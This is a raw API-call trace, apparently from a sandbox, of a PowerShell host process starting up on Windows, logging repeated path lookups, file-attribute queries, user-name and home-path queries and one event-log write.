	[0229.815] GetLastError () returned 0xcb
	[0229.815] SetErrorMode (uMode=0x1) returned 0x1
	[0229.815] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x34093d0 | out: lpFileInformation=0x34093d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0229.816] GetLastError () returned 0xcb
	[0229.816] SetErrorMode (uMode=0x1) returned 0x1
	[0229.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x29df5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0229.816] GetLastError () returned 0xcb
	[0229.816] SetErrorMode (uMode=0x1) returned 0x1
	[0229.816] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x3409564 | out: lpFileInformation=0x3409564*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0229.816] GetLastError () returned 0xcb
	[0229.816] SetErrorMode (uMode=0x1) returned 0x1
	[0229.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0229.823] GetLastError () returned 0xcb
	[0229.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x29e0a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0229.836] GetLastError () returned 0xcb
	[0229.837] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29e020, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0229.837] GetLastError () returned 0xcb
	[0229.837] SetErrorMode (uMode=0x1) returned 0x1
	[0229.837] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29e4a0 | out: lpFileInformation=0x29e4a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.837] GetLastError () returned 0xcb
	[0229.837] SetErrorMode (uMode=0x1) returned 0x1
	[0229.837] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29e020, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0229.837] GetLastError () returned 0xcb
	[0229.837] SetErrorMode (uMode=0x1) returned 0x1
	[0229.837] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29e4a0 | out: lpFileInformation=0x29e4a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0229.837] GetLastError () returned 0xcb
	[0229.837] SetErrorMode (uMode=0x1) returned 0x1
	[0229.837] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x29e034, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0229.838] GetLastError () returned 0xcb
	[0229.838] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x29dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0229.838] GetLastError () returned 0xcb
	[0229.838] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x29e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0229.838] GetLastError () returned 0xcb
	[0229.838] SetErrorMode (uMode=0x1) returned 0x1
	[0229.838] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x29e4a0 | out: lpFileInformation=0x29e4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0229.838] GetLastError () returned 0xcb
	[0229.838] SetErrorMode (uMode=0x1) returned 0x1
	[0229.838] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x29e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0229.838] GetLastError () returned 0xcb
	[0229.838] SetErrorMode (uMode=0x1) returned 0x1
	[0229.838] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x29e4a0 | out: lpFileInformation=0x29e4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0229.838] GetLastError () returned 0xcb
	[0229.838] SetErrorMode (uMode=0x1) returned 0x1
	[0229.838] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x29e034, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0229.838] GetLastError () returned 0xcb
	[0229.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x29dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0229.838] GetLastError () returned 0xcb
	[0230.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x29e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0230.016] GetLastError () returned 0xcb
	[0230.016] SetErrorMode (uMode=0x1) returned 0x1
	[0230.016] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x29e4a0 | out: lpFileInformation=0x29e4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0230.016] GetLastError () returned 0xcb
	[0230.016] SetErrorMode (uMode=0x1) returned 0x1
	[0230.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x29e020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0230.016] GetLastError () returned 0xcb
	[0230.016] SetErrorMode (uMode=0x1) returned 0x1
	[0230.016] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x29e4a0 | out: lpFileInformation=0x29e4a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0230.016] GetLastError () returned 0xcb
	[0230.016] SetErrorMode (uMode=0x1) returned 0x1
	[0230.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x29e034, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0230.016] GetLastError () returned 0xcb
	[0230.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x29dfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0230.017] GetLastError () returned 0xcb
	[0230.017] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x29e02c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0230.017] GetLastError () returned 0xcb
	[0230.017] SetErrorMode (uMode=0x1) returned 0x1
	[0230.017] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x29e4ac | out: lpFileInformation=0x29e4ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0230.017] GetLastError () returned 0xcb
	[0230.017] SetErrorMode (uMode=0x1) returned 0x1
	[0230.017] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x29e02c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0230.017] GetLastError () returned 0xcb
	[0230.017] SetErrorMode (uMode=0x1) returned 0x1
	[0230.017] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x29e4ac | out: lpFileInformation=0x29e4ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0230.017] GetLastError () returned 0xcb
	[0230.017] SetErrorMode (uMode=0x1) returned 0x1
	[0230.018] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x29e040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0230.018] GetLastError () returned 0xcb
	[0230.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x29dfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0230.018] GetLastError () returned 0xcb
	[0230.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x29e02c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0230.018] GetLastError () returned 0xcb
	[0230.018] SetErrorMode (uMode=0x1) returned 0x1
	[0230.018] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x29e4ac | out: lpFileInformation=0x29e4ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0230.018] GetLastError () returned 0xcb
	[0230.018] SetErrorMode (uMode=0x1) returned 0x1
	[0230.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x29e02c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0230.018] GetLastError () returned 0xcb
	[0230.018] SetErrorMode (uMode=0x1) returned 0x1
	[0230.018] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x29e4ac | out: lpFileInformation=0x29e4ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0230.018] GetLastError () returned 0xcb
	[0230.018] SetErrorMode (uMode=0x1) returned 0x1
	[0230.018] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x29e040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0230.019] GetLastError () returned 0xcb
	[0230.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x29dfdc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0230.019] GetLastError () returned 0xcb
	[0230.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x29e0fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0230.031] GetLastError () returned 0xcb
	[0230.031] SetErrorMode (uMode=0x1) returned 0x1
	[0230.031] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2bbf548 | out: lpFileInformation=0x2bbf548*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0230.031] GetLastError () returned 0xcb
	[0230.031] SetErrorMode (uMode=0x1) returned 0x1
	[0230.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.033] GetLastError () returned 0xcb
	[0230.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.033] GetLastError () returned 0xcb
	[0230.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.033] GetLastError () returned 0xcb
	[0230.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.033] GetLastError () returned 0xcb
	[0230.172] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7a4a48, nSize=0x29e698 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x29e698) returned 0x1
	[0230.336] GetLastError () returned 0xcb
	[0230.336] GetUserNameW (in: lpBuffer=0x7a4288, pcbBuffer=0x29e6a0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x29e6a0) returned 1
	[0230.338] ReportEventW (hEventLog=0x4ea0004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2be029c*="Available", lpRawData=0x2be0158) returned 1
	[0230.477] GetLastError () returned 0x0
	[0230.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.478] GetLastError () returned 0xcb
	[0230.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.479] GetLastError () returned 0xcb
	[0230.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e178, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.487] GetLastError () returned 0xcb
	[0230.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e128, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.487] GetLastError () returned 0xcb
	[0230.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e128, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.487] GetLastError () returned 0xcb
	[0230.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e11c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.490] GetLastError () returned 0xcb
	[0230.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.490] GetLastError () returned 0xcb
	[0230.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.490] GetLastError () returned 0xcb
	[0230.490] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0230.490] GetLastError () returned 0xcb
	[0230.490] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0230.490] GetLastError () returned 0xcb
	[0230.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e11c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.490] GetLastError () returned 0xcb
	[0230.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.491] GetLastError () returned 0xcb
	[0230.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.491] GetLastError () returned 0xcb
	[0230.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e11c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.491] GetLastError () returned 0xcb
	[0230.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.491] GetLastError () returned 0xcb
	[0230.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.491] GetLastError () returned 0xcb
	[0230.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e11c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.491] GetLastError () returned 0xcb
	[0230.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.491] GetLastError () returned 0xcb
	[0230.491] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.493] GetLastError () returned 0xcb
	[0230.493] GetCurrentProcessId () returned 0x904
	[0230.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e11c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.493] GetLastError () returned 0xcb
	[0230.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.493] GetLastError () returned 0xcb
	[0230.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.493] GetLastError () returned 0xcb
	[0230.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e108, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.494] GetLastError () returned 0xcb
	[0230.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.494] GetLastError () returned 0xcb
	[0230.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.494] GetLastError () returned 0xcb
